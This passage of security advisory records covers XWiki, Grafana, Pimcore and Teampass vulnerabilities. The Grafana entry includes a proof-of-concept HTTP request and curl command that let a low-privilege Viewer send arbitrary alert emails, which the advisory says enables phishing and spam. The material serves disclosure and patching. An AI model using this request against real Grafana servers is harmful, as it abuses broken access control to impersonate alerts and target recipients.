* https://github.com/xwiki/xwiki-platform/commit/15a6f845d8206b0ae97f37aa092ca43d4f9d6e59 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0'}, {'fixed': '14.10.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8q9q-r9v2-644m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36468'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/15a6f845d8206b0ae97f37aa092ca43d4f9d6e59'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20594'}] | {'cwe_ids': ['CWE-459'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:42:07Z', 'nvd_published_at': None} |
1.4.0 | GHSA-cvm3-pp2j-chr3 | 2023-06-12T20:09:27Z | 2023-06-12T20:09:27Z | null | ['CVE-2023-2183'] | Grafana has Broken Access Control in Alert manager: Viewer can send test alerts | ### Summary
Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.
**Reason for the error**: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.
This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.
### Details
The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.
View of the panel for the user in the Viewer role:
![image](https://user-images.githubusercontent.com/1643385/232904030-e8a8338d-f5e3-4b04-80c3-32f2164a190e.png)
Admin role - View panel for admin role:
![image](https://user-images.githubusercontent.com/1643385/232904264-c7aba0a5-0642-496b-998d-d500eb5ead7f.png)
Admin role - Next step – editing:
![image](https://user-images.githubusercontent.com/1643385/232904388-ef2ee69e-3ee3-41a9-8687-305886c5c0b9.png)
Admin role - Additional options:
![image](https://user-images.githubusercontent.com/1643385/232904480-dd493d34-d66d-47af-ab4f-3273ae8976bc.png)
### PoC
**HTTP Request by user in role Viewer**
```
POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1
Host: xxx
Cookie: grafana_session=xxx
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana
accept: application/json, text/plain, */*
content-type: application/json
…
{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"<test@example.com>",
"singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}],
"alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com",
"more":"http://example.com "},"labels":{}}}
```
**HTTP Response:**
```
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Expires: -1
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 05 Apr 2023 10:43:00 GMT
Content-Length: 471
{"alert":{"annotations":{"__value_string__":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst",
"more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test",
"testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}},
"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}],
"notified_at":"2023-04-05T12:43:00.1430203+02:00"}
```
## Result:
The attacker can send as a template alert or plain/text.
![image](https://user-images.githubusercontent.com/1643385/232917993-1294cfe0-3040-4d04-a533-a72ecbc666c0.png)
### Impact
As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.
From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.
CURL example – using a user session in the Viewer role:
```
curl -i -s -k -X $'POST' \
-H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
-b $'grafana_session=xxx' \
--data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<test@example.com>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
$'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'
```
### Mitigation
1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
2. Check the API for the possibility of accessing this endpoint for other roles than admin
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.26'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.19'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.0'}, {'fixed': '9.5.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2183'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/bugbounty'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-2183/'}] | {'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T20:09:27Z', 'nvd_published_at': None} |
1.4.0 | GHSA-m4mv-rmr7-h5f5 | 2023-06-06T01:39:48Z | 2023-06-06T01:39:48Z | null | ['CVE-2023-2983'] | Pimcore Privilege Defined With Unsafe Actions vulnerability | ### Impact
A new user can privilege escalation to admin role which least config
### Patches
Update to version 10.5.23 or apply this patches manually
https://github.com/pimcore/pimcore/commit/c8f37b19c99cd82e4e558857d3e4d5476ea7228a.patch
### Workarounds
Apply patches manually: https://github.com/pimcore/pimcore/commit/c8f37b19c99cd82e4e558857d3e4d5476ea7228a.patch
### References
https://huntr.dev/bounties/6b2f33d3-2fd0-4d2d-ad7b-2c1e2417eeb1/
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.23'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-m4mv-rmr7-h5f5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2983'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/c8f37b19c99cd82e4e558857d3e4d5476ea7228a'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6b2f33d3-2fd0-4d2d-ad7b-2c1e2417eeb1'}] | {'cwe_ids': ['CWE-267'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:39:48Z', 'nvd_published_at': None} |
1.4.0 | GHSA-p7xm-g427-jxfc | 2023-06-16T17:46:56Z | 2023-06-10T09:30:16Z | null | ['CVE-2023-3190'] | Teampass Cross-site Scripting vulnerability | In versions of nilsteampassnet/teampass prior to 3.0.9 some user input was not properly sanitized which may have lead to stored cross-site scripting (XSS) vectors in the application. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3190'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/241dbd4159a5d63b55af426464d30dbb53925705'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5562c4c4-0475-448f-a451-7c4666bc7180'}] | {'cwe_ids': ['CWE-116'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:00:25Z', 'nvd_published_at': None} |